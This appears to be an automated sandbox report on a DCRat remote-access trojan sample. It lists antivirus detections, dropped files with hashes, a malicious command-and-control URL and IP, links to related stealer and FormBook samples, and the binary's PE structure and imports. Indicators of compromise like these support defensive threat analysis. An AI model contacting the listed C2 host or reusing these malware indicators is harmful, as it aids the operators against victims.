C:\Users\user\Desktop\bdzEpOzn.log	8%	ReversingLabs
C:\Users\user\Desktop\eOeVwbKg.log	25%	ReversingLabs
C:\Users\user\Desktop\ezcDmTCJ.log	25%	ReversingLabs
C:\Users\user\Desktop\hHZMHlwF.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\lgJkAMCv.log	21%	ReversingLabs
C:\Users\user\Desktop\lpgkkzWs.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\lxQDOiwy.log	8%	ReversingLabs
C:\Users\user\Desktop\ouZtCEeJ.log	17%	ReversingLabs
C:\Users\user\Desktop\sCWCXWYE.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\slPjJBeC.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\uaYsybMf.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\unCSekjx.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\wdLbULQa.log	8%	ReversingLabs
C:\Users\user\Desktop\xJfQbpmT.log	17%	ReversingLabs
C:\Users\user\Desktop\ziDjmQZr.log	9%	ReversingLabs
C:\Users\user\ZI0Zcb1pDT.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://asdff123fsdafasdf.ru/	0%	Avira URL Cloud	safe
http://asdff123fsdafasdf.ruS	0%	Avira URL Cloud	safe
https://goAppVClientCmdlets.psm1	0%	Avira URL Cloud	safe
http://wsoft.coms/CPS/dem0	0%	Avira URL Cloud	safe
http://asdff123fsdafasdf.ru	0%	Avira URL Cloud	safe
http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php	100%	Avira URL Cloud	malware
http://www.microsoft.co	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		high
asdff123fsdafasdf.ru	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.mic	powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://asdff123fsdafasdf.ruS	8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3172837605.00000282BE124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	false		high
https://goAppVClientCmdlets.psm1	powershell.exe, 00000009.00000002.2690185459.0000019ECC217000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mic	powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micft.cMicRosof	powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp	false		high
http://wsoft.coms/CPS/dem0	powershell.exe, 00000008.00000002.3380978390.000001A4B0AE9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Blockbrowser.exe, 00000005.00000002.2307367187.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://asdff123fsdafasdf.ru/	8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	false		high
http://asdff123fsdafasdf.ru	8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micros	powershell.exe, 00000009.00000002.2702128870.0000019ECC2D2000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	asdff123fsdafasdf.ru	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1631230
Start date and time:	2025-03-06 20:20:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ccp3sJPDXs.exe renamed because original name is a hash value
Original Sample Name:	3e27b10ac7aa4c46437a300fb3ea5bdf.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@37/77@1/1
EGA Information:	Successful, ratio: 22.2%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.126.31.2, 40.126.31.131, 20.190.159.4, 20.190.159.129, 40.126.31.129, 40.126.31.3, 40.126.31.0, 20.190.159.130, 2.23.77.188, 13.107.246.60, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e3913.cd.akamaiedge.net, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, ocsp.digicert.com, login.live.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.edge.digicert.com, wu-b-net.trafficmanager.net
Execution Graph export aborted for target 8Kh5jgTdnc69SVsXvfN.exe, PID 7940 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1988 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3376 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4816 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5260 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5472 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6208 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:21:46	API Interceptor	190x Sleep call for process: powershell.exe modified
14:21:57	API Interceptor	1235639x Sleep call for process: 8Kh5jgTdnc69SVsXvfN.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	justificante de transferencia09454545.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kdjsswzx.club/myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBodit
	Shipping Document.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/2p9f/
	RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe	Get hash	malicious	FormBook	Browse	www.timeinsardinia.info/50g8/
	https://regcompany.marrkone.com/ssddcw/e095cdfe/?aef2d=cmFsaUBiYW5lc2NvdXNhLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	login.marrkone.com/4c8979e070?nxx=dccfc2c7eecccfc0cbddcdc1dbddcf80cdc1c3accdcf
	FRQ 101102-04-25-0948-015.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdf	Get hash	malicious	Unknown	Browse	melurilexuki.urseghy.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=91706aaa4ac64204
	http://netflix-official.com/e/authID=ek3Lf	Get hash	malicious	Unknown	Browse	netflix-official.com/e/img/nficon2016.ico
	PAYMENT SWIFT COPY.exe	Get hash	malicious	FormBook	Browse	www.fkrvhaupjtc.info/2p9f/
	laser (2).ps1	Get hash	malicious	FormBook	Browse	www.nmw365.xyz/d3qr/
	ZmK1CAc4VP.exe	Get hash	malicious	FormBook	Browse	www.adventurerepair24.live/qr1m/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	MasonRootkit.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	MITRE Enterprise ATTACK v16.1.xlsx	Get hash	malicious	Mimikatz	Browse	199.232.210.172
	OPENBASE ATT09918_ 6TH_MARCH_2025 _.PDF	Get hash	malicious	Unknown	Browse	199.232.214.172
	05 BOIRON F 240700457 ORDEN 05 MAR 2025.xls	Get hash	malicious	Hidden Macro 4.0	Browse	199.232.210.172
	05 BOIRON F 240700457 ORDEN 05 MAR 2025.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	payload1dec.bin.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	Quote 09052022-008_1.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	PROFORMA INVOICE.exe	Get hash	malicious	Snake Keylogger	Browse	199.232.214.172
	Quote 09052022-008_1.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.0xd10e5bd05bb0.0xd10e58feb750.DataSectionObject.CV.docm.docm	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://themortgagehub.netlify.app/	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://www.octopuspro.xyz/	Get hash	malicious	Unknown	Browse	104.21.84.46
	voice-recording-DBWONKGPCK-08-03-2025.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://sfo2.digitaloceanspaces.com/mo8043/jm1208	Get hash	malicious	Unknown	Browse	104.21.43.178
	3vnPlay__(Mimi.merhi)__Now_AUD__autoresponse_}.svg	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	http://tdi6.rianicefe.com	Get hash	malicious	Unknown	Browse	104.21.59.249
	Repeat Order.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.16.1
	https://krlbnwrvjizgauhuaegf.supabase.co/storage/v1/object/public/enroute-computer/Enroute%20Computer%20Solutions.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.149.246
	cARM.elf	Get hash	malicious	Unknown	Browse	172.67.19.24
	3vnPlay__(Harrison.edwards)__Now_AUD__autoresponse_}.svg	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\IxKHLBgB.log	5b5HHFJ4F5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8Y979B6CVq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	2uURPptBmx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Edk2E555BO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XkggQZnZYs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	63f29472e773f209f956ac819b94f41dae4fd3f0ed85d.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	3Lw8TDhz3z.exe	Get hash	malicious	HackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, Xmrig, zgRAT	Browse
	Lj4nhC1de2.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	J4eBFnLmWF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	xkh7Uu17jK.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\SavesHost\Blockbrowser.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	109
Entropy (8bit):	5.546546567932234
Encrypted:	false
SSDEEP:	3:hWQwT076OT2hBAoDEXerVowtGakHSD9CnpJBk:hlx7lCxCY3D9CnpJBk
MD5:	F2403A5501B330406FD15F32AEDDED0F
SHA1:	F0F0B796BBE404BC84C47610B0759F04D38D38A5
SHA-256:	CA01B58C19848A143EF3F1AAE4ADC208E327F715B41E9F2BAA3E35525A1E697F
SHA-512:	E3D111C4BF8E577AD6A769DD9E7A80C19455DE09EC79FA303AEC6F466CD32D3956A4BCDBA548B05DDDC7844A6B1B7B6DE1846A23CB775560CFA93B80FBD07A13
Malicious:	false
Preview:	vYMIKpBPB3nAPKtxWeQBaCJBnqFk1oSMy4DR28w1WvMfdLWtTo7u2qptPKfekbXWlaMUHc4YsYpp0ohcUVRMqhUHOTCrcRR5Xz3D8Bm1tjBdA

Process:	C:\Users\user\Desktop\Ccp3sJPDXs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	78
Entropy (8bit):	5.055708027055919
Encrypted:	false
SSDEEP:	3:41sA0xfZTBNGEZIy0ZK8KQ4A:40fdVZItZKnA
MD5:	3BB0B4ADF8E075D1C63008996A935373
SHA1:	8C504820DFD8A44DE3DC316564E37EDDD8703650
SHA-256:	FBD0FD180A02FC6A2A7EC81342F478EEF7CAFEF368A396D43020D141D4C1566A
SHA-512:	97FB3F0251C8C0AB39EACA743249774ED8CD6E7184429EA2366F14DDE5B352C21BF4CB4427B71346EC14793CB51EB23EA3ADD8B45383A6C4015EADC1BBD77A24
Malicious:	false
Preview:	%xPiiWjZXN%%jJlKQsmiWZh%..%KkQ%"C:\SavesHost/Blockbrowser.exe"%RoWNToonnyrUoB%

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulTkklh:NllUokl
MD5:	8F489B5B8555D6E9737E8EE991AA32FD
SHA1:	05B412B1818DDB95025A6580D9E1F3845F6A2AFC
SHA-256:	679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
SHA-512:	97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
Malicious:	false
Preview:	@...e................................................@..........

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.86917538506792
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FX+zTRS50fQ6HKNvoRyLRvj:Vx993DEUvT2uVgN
MD5:	673589E2B429222178557E8C45591AAF
SHA1:	31644319DC7D40A2F2FEAADFB9069489B7978C13
SHA-256:	B564D1A6DC881279016C238D41FD700A208CCBEF5B5E349D9EB31B680D79BF7A
SHA-512:	F07BEFA3640939B2882DBF625E29BA129DA0E6E3E1F9B7AEB8BB624D3251B1FC0BD9148B5231F513254E003B4B090C444EC411CB09C68773740FF442B86C64E9
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 06/03/2025 15:47:36..15:47:36, error: 0x80072746.15:47:41, error: 0x80072746.

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.1654172480904434
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Ccp3sJPDXs.exe
File size:	16'971'446 bytes
MD5:	3e27b10ac7aa4c46437a300fb3ea5bdf
SHA1:	12d7c8cc0062c6a3c7c43a798cc372f4550387d2
SHA256:	64d47e7c05d73ded8c5e3e88195f1173477e55527ad064aca606ef80fda9a38d
SHA512:	8ed2da16acd43882c617bd653c0dfdf5ca1ac9d551205fa490a0f0ff64963b8e25eb542ef1ed3f51c052151d0b70e8b25981ac2f25e2721b8aa12745f44f2571
SSDEEP:	49152:rBvZArUkk8hTtI8e7vGLMm1zGYeqq5v0faDLB3trKFprwymfIMr:Vxt8hZ+2Muz/EeaLx1S9Rmf1
TLSH:	4C07E10666D5CAF7C26147F281A7143D53A7E63629F1EB0B364F11A5E8037B0CE722A7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x13c18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x78000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0x13c18	0x13e00	a1d05e6599862fb9ed4eb7530d063f59	False	0.10381043632075472	data	3.619684819789998	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x78000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x644ec	0xbb6	Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/m			0.2581721147431621
RT_ICON	0x650a4	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11339 x 11339 px/m			0.0594167751094286
RT_DIALOG	0x758cc	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x75b54	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x75c90	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x75d7c	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x75eac	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x761e4	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x76438	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x7661c	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x767e8	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x769a0	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x76ae8	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x76f54	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x770bc	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x77210	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x7731c	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x773d8	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x774b0	0x14	data			1.0
RT_MANIFEST	0x774c4	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, 